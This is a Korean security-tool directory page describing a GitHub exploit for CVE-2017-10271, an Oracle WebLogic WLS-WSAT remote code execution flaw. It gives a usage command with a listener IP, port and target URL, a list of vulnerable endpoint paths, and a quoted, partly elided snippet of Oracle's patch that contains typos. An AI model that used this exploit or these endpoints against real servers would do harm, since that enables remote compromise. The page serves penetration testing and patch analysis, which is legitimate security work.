Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-10271 — Oracle WebLogic WLS-WSAT 원격 코드 실행 익스플로잇 (CVE-2017-10271) | Kitploit
도구/GitHubGitHub/kkirsche/cve-2017-10271
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

Oracle WebLogic WLS-WSAT 원격 코드 실행 익스플로잇 (CVE-2017-10271)

저장소 보기
129423년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2017-10271

Weblogic wls-wsat 구성 요소 역직렬화 취약점 (CVE-2017-10271) 탐지 및 익스플로잇 스크립트

사용법

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

기능

  • 독립형 Python 스크립트
    • 호스트 취약점 여부를 확인하는 점검 기능
    • Linux 대상을 위한 익스플로잇 기능
  • Metasploit 모듈
    • 호스트 취약점 여부를 확인하는 점검 기능
    • 모든 대상을 위한 익스플로잇 기능
  • 스캐너 (./scanners)
    • 호스트 취약점 여부를 확인합니다. 완전히 자체 포함되어 있습니다.

법적 고지

이 스크립트의 사용에 대한 책임은 사용자에게 있습니다. Kevin Kirsche는 이 코드를 사용하여 취해진 어떤 행동에 대해서도 책임을 지지 않습니다. 이 코드는 서버의 보안을 검증하려는 팀을 위해 작성된 것이며, 악의적인 목적으로 사용하기 위한 것이 아닙니다.

감사의 말

이 스크립트의 기반이 된 원본 POC를 작성한 Luffin에게 큰 감사를 드립니다. https://github.com/Luffin/CVE-2017-10271

위에 표시된 것 외의 취약한 URL:

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

관련 취약점

CVE 2017-3506

오라클 패치

원본 출처: https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

업데이트 출처: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
도구 다운로드